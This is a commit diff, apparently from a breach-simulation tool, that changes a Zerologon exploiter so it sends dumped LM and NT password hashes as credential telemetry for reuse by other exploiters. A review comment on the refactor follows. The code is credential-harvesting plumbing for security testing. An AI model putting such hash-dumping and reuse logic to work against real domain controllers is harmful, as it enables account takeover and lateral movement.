Agent: Send extracted creds as CredentialTelemetry from Zerologon exploiter
parent
aee3566a0c
commit
040227286a
@ -16,11 +16,14 @@ from impacket.dcerpc.v5 import epm, nrpc, rpcrt, transport
|
||||||
from impacket.dcerpc.v5.dtypes import NULL
|
from impacket.dcerpc.v5.dtypes import NULL
|
||||||
|
|
||||||
from common.utils.exploit_enum import ExploitType
|
from common.utils.exploit_enum import ExploitType
|
||||||
|
from infection_monkey.credential_collectors import LMHash, NTHash, Username
|
||||||
from infection_monkey.exploit.HostExploiter import HostExploiter
|
from infection_monkey.exploit.HostExploiter import HostExploiter
|
||||||
from infection_monkey.exploit.zerologon_utils.dump_secrets import DumpSecrets
|
from infection_monkey.exploit.zerologon_utils.dump_secrets import DumpSecrets
|
||||||
from infection_monkey.exploit.zerologon_utils.options import OptionsForSecretsdump
|
from infection_monkey.exploit.zerologon_utils.options import OptionsForSecretsdump
|
||||||
from infection_monkey.exploit.zerologon_utils.vuln_assessment import get_dc_details, is_exploitable
|
from infection_monkey.exploit.zerologon_utils.vuln_assessment import get_dc_details, is_exploitable
|
||||||
from infection_monkey.exploit.zerologon_utils.wmiexec import Wmiexec
|
from infection_monkey.exploit.zerologon_utils.wmiexec import Wmiexec
|
||||||
|
from infection_monkey.i_puppet.credential_collection import Credentials
|
||||||
|
from infection_monkey.telemetry.credentials_telem import CredentialsTelem
|
||||||
from infection_monkey.utils.capture_output import StdoutCapture
|
from infection_monkey.utils.capture_output import StdoutCapture
|
||||||
|
|
||||||
logger = logging.getLogger(__name__)
|
logger = logging.getLogger(__name__)
|
||||||
|
@ -36,7 +39,6 @@ class ZerologonExploiter(HostExploiter):
|
||||||
|
|
||||||
def __init__(self, host: object):
|
def __init__(self, host: object):
|
||||||
super().__init__(host)
|
super().__init__(host)
|
||||||
self.exploit_info["credentials"] = {}
|
|
||||||
self.exploit_info["password_restored"] = None
|
self.exploit_info["password_restored"] = None
|
||||||
self._extracted_creds = {}
|
self._extracted_creds = {}
|
||||||
self._secrets_dir = tempfile.TemporaryDirectory(prefix="zerologon")
|
self._secrets_dir = tempfile.TemporaryDirectory(prefix="zerologon")
|
||||||
|
@ -264,7 +266,7 @@ class ZerologonExploiter(HostExploiter):
|
||||||
|
|
||||||
def store_extracted_creds_for_exploitation(self) -> None:
|
def store_extracted_creds_for_exploitation(self) -> None:
|
||||||
for user in self._extracted_creds.keys():
|
for user in self._extracted_creds.keys():
|
||||||
self.add_extracted_creds_to_exploit_info(
|
self.send_extracted_creds_as_credential_telemetry(
|
||||||
user,
|
user,
|
||||||
self._extracted_creds[user]["lm_hash"],
|
self._extracted_creds[user]["lm_hash"],
|
||||||
self._extracted_creds[user]["nt_hash"],
|
self._extracted_creds[user]["nt_hash"],
|
||||||
|
@ -275,18 +277,11 @@ class ZerologonExploiter(HostExploiter):
|
||||||
self._extracted_creds[user]["nt_hash"],
|
self._extracted_creds[user]["nt_hash"],
|
||||||
)
|
)
|
||||||
|
|
||||||
def add_extracted_creds_to_exploit_info(self, user: str, lmhash: str, nthash: str) -> None:
|
def send_extracted_creds_as_credential_telemetry(
|
||||||
# TODO exploit_info["credentials"] is discontinued,
|
self, user: str, lmhash: str, nthash: str
|
||||||
# refactor to send a credential telemetry
|
) -> None:
|
||||||
self.exploit_info["credentials"].update(
|
self._telemetry_messenger.send_telemetry(
|
||||||
{
|
CredentialsTelem([Credentials([Username(user)], [LMHash(lmhash), NTHash(nthash)])])
|
||||||
user: {
|
|
||||||
"username": user,
|
|
||||||
"password": "",
|
|
||||||
"lm_hash": lmhash,
|
|
||||||
"ntlm_hash": nthash,
|
|
||||||
}
|
|
||||||
}
|
|
||||||
)
|
)
|
||||||
|
|
||||||
# so other exploiters can use these creds
|
# so other exploiters can use these creds
|
||||||
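Review bot: The comment `# so other exploiters can use these creds` on the last line of the fourth hunk is now orphaned — it explained the `self.exploit_info["credentials"].update(...)` call this commit removes, and after the refactor it sits alone below the closing paren of `send_telemetry(...)`. Fold it into a docstring on `send_extracted_creds_as_credential_telemetry`, e.g. `"""Report one user's extracted LM/NT hashes as a CredentialsTelem so other exploiters can reuse them."""`, and drop the trailing comment (the method may continue past the hunk, so check nothing else depended on it). Separately, the caller `store_extracted_creds_for_exploitation` in the third hunk still emits one telemetry message per user even though `CredentialsTelem` takes a list of `Credentials` (the new line wraps a single-element list); if the messenger does no batching, collecting the `Credentials` in the loop and sending once would avoid a round trip per dumped account, but I can't tell from here whether the island expects one credential set per message. `self._telemetry_messenger` is not assigned in the visible `__init__` in the second hunk, so it presumably comes from `HostExploiter`; worth confirming it is set before the exploiter runs rather than relying on the secrets dump never reaching this path with it unset.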